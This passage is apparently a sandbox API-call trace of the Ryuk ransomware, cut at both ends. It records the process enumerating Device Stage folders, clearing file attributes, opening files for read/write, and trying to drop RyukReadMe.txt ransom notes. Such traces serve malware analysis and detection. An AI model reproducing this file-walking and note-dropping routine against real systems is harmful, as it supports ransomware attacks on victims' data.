dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.529] GetLastError () returned 0x5 [0159.529] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.529] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.529] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.530] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.530] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.530] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.530] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", dwFileAttributes=0x80) returned 0 [0159.530] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.531] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.531] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.531] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.531] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0159.531] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.531] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.531] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.531] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.532] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", dwFileAttributes=0x80) returned 0 [0159.532] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.532] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.532] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.532] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.532] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.532] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", dwFileAttributes=0x80) returned 0 [0159.532] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.533] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.533] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.533] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.533] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", dwFileAttributes=0x80) returned 0 [0159.533] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.533] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.533] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.533] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.534] SetLastError (dwErrCode=0x0) [0159.534] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.537] GetLastError () returned 0x5 [0159.537] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.537] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.537] SetLastError (dwErrCode=0x0) [0159.537] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.537] GetLastError () returned 0x5 [0159.537] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.537] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.537] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.537] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.537] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.537] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", dwFileAttributes=0x80) returned 0 [0159.538] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.538] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.538] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.538] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.538] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.538] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0159.538] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.538] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.538] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.539] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.539] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", dwFileAttributes=0x80) returned 0 [0159.539] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.539] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.539] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.539] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.539] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.539] SetLastError (dwErrCode=0x0) [0159.539] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.539] GetLastError () returned 0x5 [0159.539] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.539] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.540] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.540] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.540] SetLastError (dwErrCode=0x0) [0159.540] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.540] GetLastError () returned 0x5 [0159.540] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.540] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.540] SetLastError (dwErrCode=0x0) [0159.540] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.540] GetLastError () returned 0x5 [0159.540] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.540] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.540] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.540] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.540] SetLastError (dwErrCode=0x0) [0159.540] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.541] GetLastError () returned 0x5 [0159.541] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.541] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.541] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.541] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.541] SetLastError (dwErrCode=0x0) [0159.541] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.542] GetLastError () returned 0x5 [0159.542] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.542] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.542] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.542] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.542] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.542] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0159.542] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.542] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.542] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.543] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.543] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.543] SetLastError (dwErrCode=0x0) [0159.543] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.543] GetLastError () returned 0x5 [0159.543] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.543] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.543] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.543] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.543] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", dwFileAttributes=0x80) returned 0 [0159.543] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.543] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.543] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.544] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.544] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", dwFileAttributes=0x80) returned 0 [0159.544] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.544] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.544] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.544] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.544] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", dwFileAttributes=0x80) returned 0 [0159.544] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.545] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.545] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.545] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", dwFileAttributes=0x80) returned 0 [0159.545] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.545] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.545] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.546] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", dwFileAttributes=0x80) returned 0 [0159.546] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.546] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.546] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.546] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.546] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", dwFileAttributes=0x80) returned 0 [0159.546] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.546] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.547] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.547] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", dwFileAttributes=0x80) returned 0 [0159.547] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.547] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.547] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.547] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.547] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", 